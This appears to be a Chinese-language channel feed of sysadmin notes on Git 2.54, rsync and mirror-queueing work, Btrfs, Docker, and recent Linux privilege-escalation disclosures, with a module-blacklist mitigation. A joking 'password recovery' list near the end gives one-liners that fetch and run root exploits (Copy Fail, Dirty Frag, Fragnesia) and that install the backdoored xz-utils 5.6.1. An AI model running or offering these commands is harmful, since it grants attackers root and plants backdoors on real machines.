困扰我多个月的 bug：
https://github.com/scop/bash-completion/issues/1527

Git 2.54
- git history reword <commit> 重写 commit mesasage
- git history split <commit> 将一个 commit 分成两个
https://github.blog/open-source/git/highlights-from-git-2-54/

继 TUNA 镜像站发明了 Git 请求排队技术之后，USTC 镜像站也发明了 Rsync 排队技术（

git-http-backend 是 CGI 程序，往 stderr 输出文字就会在客户端展示为 remote: (message)，但 rsync 是 inetd 程序，只能在 motd 部分整活
（所以你看到的排队提示对 rsync 来说就是缓慢输出的 motd）

查了半天锁结果是 chan<- 的问题

在 chan<- 外面套了一层 select{}，目前 rsync-proxy 运行 15 小时还没出故障，应该算稳定了

rsync 这个 PROXY protocol 的支持，端口号可以是任何数值但偏偏不能是 0：
clientname.c:295 @ rsync

🕊了好久的一个 QoL trick，终于憋出来了（
https://ibug.io/p/79

Copy Fail: A local privilege escalation vulnerability with a working PoC python script exploiting a logic flaw in the kernel crypto API (AF_ALG) affecting most Linux distributions.

https://copy.fail/
https://seclists.org/oss-sec/2026/q2/281

向巨佬学习
https://t.iss.one/TheB1ackParade/1045

#今天又看了啥
重要公告 | e-Science中心服务收费预通知

众所周知，中心长期保持极其精干的技术“团队”，以极高的效率支撑服务运行。
高效运转的背后，只靠中心的“精干团队”其实是远远不够的。也许大家没有参与e-Science运营中的修改代码、服务规划、问题解答等等细枝末节，但e-Science深知，服务来自于师生需求与学校支持，不是凭空变出的。
...
人力方面，抛开身体健康状况不计折损，众所周知“团队”有1人。

https://mp.weixin.qq.com/s/1oDWvMKRE751yzBhAuwwLA

南大 yaoge123 燃尽了（

ubuntu通过kmod包分发了一个/etc/modprobe.d/disable-algif_aead.conf来禁用algif_aead模块

https://docs.docker.com/engine/storage/containerd

The containerd image store is the default storage backend for Docker Engine 29.0 and later on fresh installations. If you upgraded from an earlier version, your daemon continues using the legacy graph drivers (overlay2) until you enable the containerd image store.

#TIL 尽管 Btrfs 的不同 subvolume 可以出现在同一个 mountpoint 下（例如 mount -o subvolid=5 看到的内容），跨 subvolume 移动文件（renameat2(2)）还是会吃个 EXDEV，需要 fallback 到 cp + unlink；但是 cp 的时候又可以 ioctl(FICLONE) 省去实际读写文件的过程，最终效果就是“移动了，但又没移动”（只有 inode 变了）

Dirty Frag: Universal Linux LPE
和 Copy Fail 类似，绝大多数发行版可一键提权

禁用 esp4、esp6、rxrpc 可以缓解

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

https://dirtyfrag.io/
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c

#TIL 继 CentOS 7 之后新的抗洞选手出现了：ZFS
Credit: shankerwangmiao

iBug 的最新整活
https://ibug.io/p/80

ZFS 再次幸免（

1. Linux 找回密码教程，建议收藏！
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码

2. 你的 Linux 密码又忘了？
没关系，这里还有一个新的！
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

3. 不想再忘记密码了？
我们有专业的黑客团队帮您运维服务器和保管密码！
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh

4. 容易忘记密码的有福了，每天都有新办法！
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡，让它down掉，然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可

5. 什么，你买不起高端网卡？那试试这个吧！
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

6. 听说您的机房不允许ssh外连，只能通过KVM物理访问服务器? 没关系，我们的专业黑客团队也可以通过nginx帮助运维您的服务器！
https://depthfirst.com/nginx-rift

合格的 1 楼
https://www.v2ex.com/t/1212729

没苦硬吃是吧

https://github.com/oven-sh/bun/pull/30412
？